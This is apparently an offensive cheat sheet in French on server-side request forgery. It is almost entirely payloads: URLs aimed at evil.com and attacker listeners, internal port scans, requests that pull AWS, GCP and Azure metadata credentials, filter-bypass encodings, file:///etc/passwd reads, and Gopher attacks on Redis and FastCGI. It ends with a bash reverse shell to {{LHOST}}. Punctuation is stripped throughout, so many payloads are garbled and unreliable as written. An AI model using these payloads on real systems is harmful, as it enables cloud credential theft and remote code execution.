SSRF — Server-Side Request Forgery

# Paramètres suspects (URL, fichier, import, webhook)
urlhttp//evil.com
filehttp//evil.com
pathhttp//evil.com
srchttp//evil.com
desthttp//evil.com
redirecthttp//evil.com
urihttp//evil.com
nexthttp//evil.com
callbackhttp//evil.com
image_urlhttp//evil.com
proxyhttp//evil.com
# Tester avec un serveur de rebond (Burp Collaborator, ngrok, interactsh)
urlhttp//{{LHOST}}burpcollaboratornet/test
urlhttp//{{LHOST}}{{LPORT}}/ssrf-test
# Écouter
python3 -m httpserver {{LPORT}}
nc -lvnp {{LPORT}}

# Scan de ports internes via SSRF (Blind SSRF + timing ou réponse)
urlhttp//127.0.0.122
urlhttp//127.0.0.13306
urlhttp//127.0.0.16379   # Redis
urlhttp//127.0.0.18080
urlhttp//127.0.0.19200   # Elasticsearch
urlhttp//127.0.0.12375   # Docker API
# Accès à des endpoints internes
urlhttp//localhost/admin
urlhttp//192.168.1.1/
urlhttp//10.0.0.18443/internal/api
# Schémas alternatifs
urlhttp//0x7f000001/           # 127.0.0.1 en hex
urlhttp//0177.0.0.1/           # en octal
urlhttp//2130706433/           # en décimal
urlhttp//1                # IPv6 localhost
urlhttp//localhost.localdomain/
urlhttp//localtest.me/         # DNS vers 127.0.0.1

# IMDSv1 (pas de token requis)
urlhttp//169.254.169.254/latest/meta-data/
urlhttp//169.254.169.254/latest/meta-data/iam/security-credentials/
urlhttp//169.254.169.254/latest/meta-data/iam/security-credentials/{{ROLE_NAME}}
# Réponse avec credentials temporaires AWS :
# AccessKeyId, SecretAccessKey, Token
# Hostname → IP (bypass filtre hostname)
urlhttp//169.254.169.254/latest/user-data    # scripts cloud-init
urlhttp//169.254.169.254/latest/meta-data/hostname
# IMDSv2 (token requis — si pas filtré sur SSRF)
# Step 1 : obtenir un token
curl -X PUT "http://169.254.169.254/latest/api/token" 
  -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"
# Step 2 : utiliser le token
curl "http://169.254.169.254/latest/meta-data/" 
  -H "X-aws-ec2-metadata-token: {{TOKEN}}"

urlhttp//metadata.google.internal/computeMetadata/v1/
# Header requis : Metadata-Flavor: Google
urlhttp//metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
urlhttp//metadata.google.internal/computeMetadata/v1/project/project-id

urlhttp//169.254.169.254/metadata/instanceapi-version=2021-02-01
# Header requis : Metadata: true
urlhttp//169.254.169.254/metadata/identity/oauth2/tokenapi-version=2021-02-01&resource=https://management.azure.com/

# Bypass whitelist de domaine
urlhttp//trusted.comevilcom
urlhttp//trusted.com.evil.com/    # sous-domaine evil
# Bypass blacklist 127.0.0.1
urlhttp//127.1/
urlhttp//127.0.1/
urlhttp//0/                       # 0.0.0.0
urlhttp//00000ffff127001  # IPv6 mapped
urlhttp//spoofed.burpcollaborator.net/ # DNS vers 127.0.0.1
# Redirections (si le serveur suit les redirections)
# Serveur attaquant redirige vers 127.0.0.1
python3 -c 
import httpserver
class HhttpserverBaseHTTPRequestHandler
    def do_GETself
        selfsend_response301
        selfsend_header'Location' 'http://127.0.0.1:8080/admin'
        selfend_headers
httpserverHTTPServer'' {{LPORT}} Hserve_forever
urlhttp//{{LHOST}}{{LPORT}}/redirect
# URL encoding
urlhttp//313237303031   # 127.0.0.1 encodé
urlhttp//127.0.0.1evilcom
# Protocoles alternatifs
urlfile///etc/passwd              # lecture de fichiers
urlgopher//127.0.0.16379/_1  # Redis via SSRF
urldict//127.0.0.16379/INFO

# Redis via SSRF (Gopher protocol)
# Écrire une crontab dans /var/spool/cron/root
gopher//127.0.0.16379/_248
# Générer le payload Redis SSRF
# Outil : Gopherus
python3 gopheruspy --exploit redis
> ReverseShell
> {{LHOST}}
> {{LPORT}}
# Memcached via SSRF
urlgopher//127.0.0.111211/_set ssrf 0 60 8
# FastCGI (PHP-FPM) — RCE si port 9000 accessible
# Gopherus
python3 gopheruspy --exploit fastcgi
> /var/www/html/index.php
> system'bash -i >& /dev/tcp/{{LHOST}}/{{LPORT}} 0>&1';